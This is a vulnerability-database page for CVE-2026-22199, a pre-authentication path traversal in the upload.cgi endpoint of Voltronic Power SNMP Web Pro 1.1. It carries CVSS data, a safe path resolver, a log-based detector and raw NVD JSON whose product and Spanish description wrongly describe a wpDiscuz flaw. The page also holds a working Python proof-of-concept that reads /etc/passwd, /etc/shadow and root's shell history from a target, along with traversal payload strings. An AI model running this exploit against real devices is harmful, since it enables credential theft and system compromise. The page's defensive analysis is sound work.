Security Vulnerability Report
CVE-2026-22199 CVSS 7.5 HIGH

Published: 2026-03-13 19:54:10
Last Modified: 2026-04-23 13:16:11

Description

Voltronic Power SNMP Web Pro version 1.1 contains a pre-authentication path traversal vulnerability in the upload.cgi endpoint that allows unauthenticated attackers to read arbitrary files on the device filesystem by supplying directory traversal sequences in the params parameter. Attackers can exploit this vulnerability to disclose sensitive files such as password hashes, which can be cracked offline to obtain root-level access and enable full system compromise.
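The root cause described above is CWE-22: a client-controlled value is joined onto a server-side directory and used as a filesystem path without confirming the result stays inside that directory. The source of upload.cgi is not reproduced on this page, so the following is an added illustration of the bug shape and its fix in Python, not the vendor's code. The root directory `/var/www/uploads` and the function names are assumptions; the payloads are the page's PoC traversal string plus encoded variants an attacker would try.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Hypothetical document root for the CGI's file handling. The real directory
# used by SNMP Web Pro's upload.cgi is not documented on this page; the root
# only matters for showing how the containment check behaves.
UPLOAD_ROOT = "/var/www/uploads"


def vulnerable_resolve(root: str, params: str) -> str:
    """The CWE-22 shape: join the client value onto root and use the result.

    posixpath.normpath shows what the kernel will see once the '..' segments
    are applied: six '../' from a three-deep root lands at '/'.
    """
    return posixpath.normpath(posixpath.join(root, unquote(params)))


def safe_resolve(root: str, params: str) -> Optional[str]:
    """Resolve a client-supplied relative path strictly inside root.

    Returns the normalized absolute path, or None when the request must be
    rejected. The check is lexical; on a real filesystem the open() call
    should additionally confirm os.path.realpath(result) is still under
    root, so a symlink planted inside root cannot point outside it.
    """
    # Decode exactly once, as the web server would. A double-encoded
    # "%252e%252e" decodes to the literal "%2e%2e", which is then treated as
    # an ordinary (harmless) file name rather than as a parent reference.
    decoded = unquote(params)
    if "\x00" in decoded:
        return None  # a NUL byte would truncate the path in a C-based CGI
    if decoded.startswith("/") or "\\" in decoded:
        return None  # absolute paths and Windows separators are never legitimate here
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded))
    # commonpath compares whole components, so "/var/www/uploads_evil" does
    # not pass as a child of "/var/www/uploads" the way startswith() would.
    if posixpath.commonpath([root_norm, candidate]) != root_norm:
        return None
    return candidate


def demo() -> dict:
    """Run both resolvers over the PoC payload and a few variants."""
    inputs = [
        "../" * 6 + "etc/passwd",            # the page's PoC payload
        "..%2F..%2F..%2F..%2Fetc%2Fshadow",   # percent-encoded separators
        "%2e%2e/%2e%2e/%2e%2e/etc/passwd",    # percent-encoded dots
        "../uploads_evil/x",                  # prefix-confusion attempt
        "firmware/update.bin",                # legitimate relative path
    ]
    return {p: (vulnerable_resolve(UPLOAD_ROOT, p), safe_resolve(UPLOAD_ROOT, p))
            for p in inputs}


if __name__ == "__main__":
    for payload, (naive, safe) in demo().items():
        print(f"{payload!r:45} naive -> {naive:<36} safe -> {safe}")
```

Every traversal variant collapses to `/etc/passwd` or `/etc/shadow` under the naive join and is rejected by `safe_resolve`, while `firmware/update.bin` resolves under the root in both. The lexical check is necessary but not sufficient on its own: the realpath check mentioned in the docstring is what closes the symlink case.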

CVSS Details

CVSS v3.1 Score: 7.5 (HIGH)
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS v4.0 Score: 8.7 (HIGH)
CVSS v4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N (environmental and supplemental metrics not defined)
Weakness: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)

Configurations (Affected Products)

cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* (versionEndExcluding 7.6.47) - VULNERABLE
Note: the CPE match criteria carried in this record identifies the gvectors wpDiscuz WordPress plugin, not Voltronic Power SNMP Web Pro, and the record's Spanish-language description likewise describes a wpDiscuz vote-manipulation issue. Neither corresponds to the vulnerability described above. Per the description, the affected product is:
Voltronic Power SNMP Web Pro <= 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2026-22199 PoC - Voltronic Power SNMP Web Pro Path Traversal
# Target: /cgi-bin/upload.cgi?params=../../../../etc/passwd


def exploit_cve_2026_22199(target_url, filename='/etc/passwd'):
    """
    Exploit for pre-auth path traversal in upload.cgi

    Args:
        target_url: Base URL of the vulnerable target
        filename: Path to file to read (default: /etc/passwd)

    Returns:
        Content of the requested file, or None on failure
    """
    # Construct traversal path (six levels is enough to reach / from any
    # plausible CGI working directory)
    traversal = '../' * 6
    target_path = traversal + filename.lstrip('/')

    # Build exploit URL
    exploit_url = f"{target_url.rstrip('/')}/cgi-bin/upload.cgi"
    params = {'params': target_path}

    print(f"[*] Target: {exploit_url}")
    print(f"[*] Attempting to read: {filename}")
    print(f"[*] Path traversal: {target_path}")

    try:
        # Send request without authentication
        response = requests.get(exploit_url, params=params, timeout=10)

        # Note: a 200 alone does not prove the file was returned; inspect the
        # body (e.g. "root:" lines for /etc/passwd) before drawing conclusions.
        if response.status_code == 200:
            print("[+] Success! File content:")
            print(response.text)
            return response.text
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return None

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


def read_sensitive_files(target_url):
    """
    Attempt to read multiple sensitive files; stops at the first one that
    is returned, since one readable file confirms the vulnerability.
    """
    sensitive_files = [
        '/etc/passwd',
        '/etc/shadow',
        '/etc/hosts',
        '/var/log/messages',
        '/root/.bash_history',
    ]

    for file in sensitive_files:
        print(f"\n[*] Trying: {file}")
        result = exploit_cve_2026_22199(target_url, file)
        if result:
            break


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url> [filename]")
        print(f"Example: python {sys.argv[0]} http://target.com /etc/passwd")
        sys.exit(1)

    target = sys.argv[1]
    filename = sys.argv[2] if len(sys.argv) > 2 else '/etc/passwd'

    if len(sys.argv) > 2:
        exploit_cve_2026_22199(target, filename)
    else:
        read_sensitive_files(target)
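The PoC above leaves a clear trace in the device's or a fronting proxy's web server log: an unauthenticated GET to upload.cgi whose params value contains a parent-directory segment. The following detection routine is an added example, not part of the page's PoC or of any vendor tooling. It assumes Common Log Format with the query string recorded, and the log lines below are constructed samples (RFC 5737 documentation addresses, not real traffic). It decodes the parameter repeatedly so that `%2F`, `%2e%2e` and double-encoded forms are caught as well as the plain `../` the PoC sends.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log in Common Log Format. Not real captured requests;
# the three traversal attempts mirror the PoC payload and encoded variants,
# the last two lines are benign traffic that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Mar/2026:20:01:11 +0000] "GET /cgi-bin/upload.cgi?params=../../../../../../etc/passwd HTTP/1.1" 200 1322
203.0.113.7 - - [13/Mar/2026:20:01:12 +0000] "GET /cgi-bin/upload.cgi?params=..%2F..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 906
203.0.113.7 - - [13/Mar/2026:20:01:13 +0000] "GET /cgi-bin/upload.cgi?params=%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0
198.51.100.2 - - [13/Mar/2026:20:02:00 +0000] "GET /cgi-bin/upload.cgi?params=firmware/update.bin HTTP/1.1" 200 51200
198.51.100.2 - - [13/Mar/2026:20:02:05 +0000] "GET /index.html HTTP/1.1" 200 4021
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)


def decode_repeatedly(value: str, max_rounds: int = 3) -> str:
    """Undo up to max_rounds layers of percent-encoding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_parent_segment(value: str) -> bool:
    """True if any path segment is exactly '..' after decoding.

    Backslashes are treated as separators so '..\\..\\etc' is caught too.
    A literal 'a..b' segment is not a parent reference and is left alone.
    """
    normalized = decode_repeatedly(value).replace("\\", "/")
    return any(segment == ".." for segment in normalized.split("/"))


def detect_upload_cgi_traversal(log_text: str) -> List[Dict[str, object]]:
    """Return one record per request to upload.cgi whose params traverses upward."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/upload.cgi"):
            continue
        # parse_qs percent-decodes once; decode_repeatedly handles any further layers.
        for raw in parse_qs(url.query, keep_blank_values=True).get("params", []):
            if has_parent_segment(raw):
                hits.append({
                    "ip": m["ip"],
                    "timestamp": m["ts"],
                    "decoded_params": decode_repeatedly(raw),
                    "status": m["status"],
                    "size": m["size"],
                    # A 200 with a non-empty body is the signal that the read likely worked.
                    "likely_success": m["status"] == "200" and m["size"] not in ("0", "-"),
                })
    return hits


if __name__ == "__main__":
    for hit in detect_upload_cgi_traversal(SAMPLE_LOG):
        verdict = "LIKELY READ" if hit["likely_success"] else "attempt"
        print(f"{hit['timestamp']} {hit['ip']} {verdict}: {hit['decoded_params']} "
              f"(status {hit['status']}, {hit['size']} bytes)")
```

Run against the sample, the routine flags the three requests from 203.0.113.7 and none of the benign ones; the two successful reads stand out by their 200 status and plausible body sizes. In practice the size of a returned `/etc/passwd` or `/etc/shadow` is a useful secondary indicator, and any hit should be followed by the offline-cracking risk the description notes: treat credentials on the device as exposed.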

References

https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22192-22199_Voltronic-Power_Preauth_root_RCE.txt
https://voltronicpower.com/
https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191/
https://www.vulncheck.com/advisories/voltronic-power-snmp-web-pro-path-traversal-via-upload-cgi

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22199",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-13T19:54:09.933",
    "lastModified": "2026-04-23T13:16:11.417",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Voltronic Power SNMP Web Pro version 1.1 contains a pre-authentication path traversal vulnerability in the upload.cgi endpoint that allows unauthenticated attackers to read arbitrary files on the device filesystem by supplying directory traversal sequences in the params parameter. Attackers can exploit this vulnerability to disclose sensitive files such as password hashes, which can be cracked offline to obtain root-level access and enable full system compromise."
      },
      {
        "lang": "es",
        "value": "wpDiscuz before 7.6.47 contains a vote manipulation vulnerability that allows attackers to manipulate comment votes by obtaining fresh nonces and bypassing rate limiting through client-controlled headers. Attackers can vary User-Agent headers to reset rate limits, request nonces from the unauthenticated wpdGetNonce endpoint, and vote multiple times using IP rotation or reverse-proxy header manipulation."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*",
                "versionEndExcluding": "7.6.47",
                "matchCriteriaId": "A81F51B9-0C21-4F7E-876B-C09A66B9AE05"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22192-22199_Voltronic-Power_Preauth_root_RCE.txt",
        "source": "[email protected]"
      },
      {
        "url": "https://voltronicpower.com/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.vulncheck.com/advisories/voltronic-power-snmp-web-pro-path-traversal-via-upload-cgi",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22192-22199_Voltronic-Power_Preauth_root_RCE.txt",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      },
      {
        "url": "https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191/",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}